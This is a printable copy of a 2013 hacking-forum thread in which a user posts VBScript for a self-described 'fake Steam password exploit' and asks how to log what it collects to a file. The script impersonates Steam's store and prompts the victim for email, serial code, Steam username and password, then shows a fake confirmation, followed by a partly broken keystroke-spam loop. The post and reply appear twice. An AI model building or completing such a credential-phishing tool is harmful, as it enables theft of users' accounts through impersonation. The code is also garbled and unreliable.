![]() |
|
Log For My Fake Steam "Password" Exploit - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Log For My Fake Steam "Password" Exploit (/Thread-Log-For-My-Fake-Steam-Password-Exploit) |
Log For My Fake Steam "Password" Exploit - ninja805 - 10-30-2013 Hi, I have a growing problem: I need a logging system that actually WORKS for a .vbs file. I'll post my simple code below, I need it where the components are logged and sent to a file like C:\log.txt\, thanks! - Adam P.S. I'm new to coding .vbs and .bat P.S.S. I need an answer quick! ;-; P.S.S.S. I already have every other file that corresponds with this ready, this is just the problem. Code: Code: set shell = createobject ("wscript.shell")
stremail = inputbox ("Insert Your Email, Ex. email@emailhost.com/net/etc.")
strser = inputbox ("Insert Your Serial Code | Ex. 123-4567-8910")
strser = inputbox ("Insert Your Serial Code Again | Ex. 123-4567-8910")
strgame = inputbox ("Enter Game's Name (Ex. Crusader Kings II, Case Sensitive)")
struser = inputbox ("Insert your Username (CaSe SeNsItIvE) for Steam so that the codeline can process the game order")
strpassd = inputbox ("Insert your Password (CaSe SeNsItIvE) for Steam so that the codeline can process the game order")
If not isnumeric (strtimes & strspeed & strtimeneed) then
msgbox "Thank you for sending your info to Steam's Store, your game will be emailed to you in a Zipped document."
wscript.quit
End If
struser2 = struser * 1000
do
msgbox "You have " & struser & " seconds to get to your input area where you are going to spam."
wscript.sleep struser2
shell.sendkeys ("SIR activated" & "{enter}")
for i=0 to strtimes
shell.sendkeys (stser & "{enter}")
wscript.sleep strgame
Next
shell.sendkeys ("SIR deactivated" & "{enter}")
wscript.sleep strgame * strtimes / 10
returnvalue=MsgBox ("Error",36)
If returnvalue=6 Then
Msgbox "Ok Steam's Immediate Response team will report back to you "
End If
If returnvalue=7 Then
msgbox "SIR is shutting down"
wscript.quit
End IF
loop
Log For My Fake Steam "Password" Exploit - ninja805 - 10-30-2013 Hi, I have a growing problem: I need a logging system that actually WORKS for a .vbs file. I'll post my simple code below, I need it where the components are logged and sent to a file like C:\log.txt\, thanks! - Adam P.S. I'm new to coding .vbs and .bat P.S.S. I need an answer quick! ;-; P.S.S.S. I already have every other file that corresponds with this ready, this is just the problem. Code: Code: set shell = createobject ("wscript.shell")
stremail = inputbox ("Insert Your Email, Ex. email@emailhost.com/net/etc.")
strser = inputbox ("Insert Your Serial Code | Ex. 123-4567-8910")
strser = inputbox ("Insert Your Serial Code Again | Ex. 123-4567-8910")
strgame = inputbox ("Enter Game's Name (Ex. Crusader Kings II, Case Sensitive)")
struser = inputbox ("Insert your Username (CaSe SeNsItIvE) for Steam so that the codeline can process the game order")
strpassd = inputbox ("Insert your Password (CaSe SeNsItIvE) for Steam so that the codeline can process the game order")
If not isnumeric (strtimes & strspeed & strtimeneed) then
msgbox "Thank you for sending your info to Steam's Store, your game will be emailed to you in a Zipped document."
wscript.quit
End If
struser2 = struser * 1000
do
msgbox "You have " & struser & " seconds to get to your input area where you are going to spam."
wscript.sleep struser2
shell.sendkeys ("SIR activated" & "{enter}")
for i=0 to strtimes
shell.sendkeys (stser & "{enter}")
wscript.sleep strgame
Next
shell.sendkeys ("SIR deactivated" & "{enter}")
wscript.sleep strgame * strtimes / 10
returnvalue=MsgBox ("Error",36)
If returnvalue=6 Then
Msgbox "Ok Steam's Immediate Response team will report back to you "
End If
If returnvalue=7 Then
msgbox "SIR is shutting down"
wscript.quit
End IF
loop
RE: Log For My Fake Steam "Password" Exploit - Coder-san - 10-30-2013 "Finding" is not coding. You are confusing yourself with a beginner. Please learn to code and then check back with a DOUBT not ask for a "quick answer". Also use [code] tags around the code. RE: Log For My Fake Steam "Password" Exploit - Coder-san - 10-30-2013 "Finding" is not coding. You are confusing yourself with a beginner. Please learn to code and then check back with a DOUBT not ask for a "quick answer". Also use [code] tags around the code. |